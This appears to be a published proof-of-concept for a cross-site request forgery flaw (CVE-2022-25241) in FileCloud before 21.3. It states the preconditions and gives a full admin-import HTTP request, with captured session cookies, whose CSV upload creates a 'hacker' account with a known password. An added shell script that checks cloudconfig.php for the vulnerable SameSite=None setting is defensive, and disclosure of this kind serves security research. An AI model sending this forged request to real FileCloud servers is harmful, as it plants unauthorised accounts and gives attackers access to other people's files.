# Exploit Title: FileCloud 21.2 - Cross-Site Request Forgery (CSRF)
# Date: 2022-02-20
# Exploit Author: Masashi Fujiwara
# Vendor Homepage: https://www.filecloud.com/
# Software Link: https://hub.docker.com/r/filecloud/filecloudserver21.2
# Version: All versions of FileCloud prior to 21.3 (Fixed: version 21.3.0.18447)
# Tested on:
#   OS: Ubuntu 18.04.6 LTS (Docker)
#   Apache: 2.4.52
#   FileCloud: 21.2.4.17315
# CVE: CVE-2022-25241 (https://www.filecloud.com/supportdocs/fcdoc/latest/server/security-advisories/advisory-2022-01-3-threat-of-csrf-via-user-creation)

# Conditions
1. Only vulnerable if cookies have samesite set to None (SameSite=None).
   echo 'define("TONIDOCLOUD_COOKIE_SAME_SITE_TYPE", "None");' >> /var/www/html/config/cloudconfig.php
2. Use HTTPS as the target URL (when cookies are set with SameSite=None, Secure must also be set).

# PoC (HTML)
CSRF PoC for CVE-2022-25241
Create hacker user with Password1 via CSV file upload.

# HTTPS Request
POST /admin/?op=import&sendapprovalemail=0&sendpwdasplaintext=0 HTTP/1.1
Host: 192.168.159.129:8443
Cookie: X-XSRF-TOKEN-admin=rhedxvo0gullbvzkgwwv; X-XSRF-TOKEN=rhedxvo0gullbvzkgwwv; tonidocloud-au=admin; tonidocloud-as=29352577-cfaa-42e6-80e5-7a304bc78333; tonidocloud-ah=4514fb08f852d2682151efdb938d377734b1e493
Content-Length: 365
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryiAXsUsJ2ZV54DFuW
Connection: close

------WebKitFormBoundaryiAXsUsJ2ZV54DFuW
Content-Disposition: form-data; name="uploadFormElement"; filename="user.csv"
Content-Type: application/vnd.ms-excel

UserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified
hacker,hacker@hacker.com,Password1,hacker,FULL,02/26/2222,Group1,YES
------WebKitFormBoundaryiAXsUsJ2ZV54DFuW--

# CSV file format
UserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified
hacker,hacker@hacker.com,Password1,hacker,FULL,02/26/2222,Group1,YES
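
# Checking for the precondition (added example)
The following script is an added example, not part of the original advisory or of FileCloud: it audits a cloudconfig.php for the SameSite=None setting named under "Conditions" so an administrator can tell whether an unpatched install meets the precondition. The function names, verdict words and sample files are assumptions made for illustration; only the constant name and config path come from the advisory.

```shell
#!/bin/sh
# Added example, not part of the advisory: report whether a FileCloud
# cloudconfig.php carries the SameSite=None setting listed under "Conditions".

# Print the value of every active define() of the cookie SameSite constant.
# Lines that start with //, #, /* or * are treated as comments and skipped
# (a simplification: comments opened mid-line are not recognised).
samesite_values() {
    grep -Ev '^[[:space:]]*(//|#|/\*|\*)' "$1" |
    sed -nE "s/.*define\([[:space:]]*[\"']TONIDOCLOUD_COOKIE_SAME_SITE_TYPE[\"'][[:space:]]*,[[:space:]]*[\"']([^\"']*)[\"'].*/\1/p"
}

# Print one verdict word for the given config file:
#   AT_RISK    - an active define sets the value to None (any letter case)
#   OK         - the constant is defined and no active define uses None
#   NOT_SET    - no active define in this file; the product default applies
#   UNREADABLE - file missing or not readable
audit_cloudconfig() {
    [ -r "$1" ] || { echo UNREADABLE; return 0; }
    vals=$(samesite_values "$1")
    if [ -z "$vals" ]; then
        echo NOT_SET
    elif printf '%s\n' "$vals" | grep -qix 'none'; then
        echo AT_RISK
    else
        echo OK
    fi
}

# Demo on constructed sample files (not real FileCloud configs).
demo_dir=$(mktemp -d)
printf '%s\n' '<?php' 'define("TONIDOCLOUD_COOKIE_SAME_SITE_TYPE", "None");' > "$demo_dir/none.php"
printf '%s\n' '<?php' "define('TONIDOCLOUD_COOKIE_SAME_SITE_TYPE', 'Strict');" > "$demo_dir/strict.php"
printf '%s\n' '<?php' '// define("TONIDOCLOUD_COOKIE_SAME_SITE_TYPE", "None");' > "$demo_dir/commented.php"
for f in none strict commented; do
    printf '%s: %s\n' "$f.php" "$(audit_cloudconfig "$demo_dir/$f.php")"
done
rm -rf "$demo_dir"
```

On a real host, call audit_cloudconfig /var/www/html/config/cloudconfig.php; an AT_RISK verdict on a version prior to 21.3.0.18447 means both conditions in the advisory can be met.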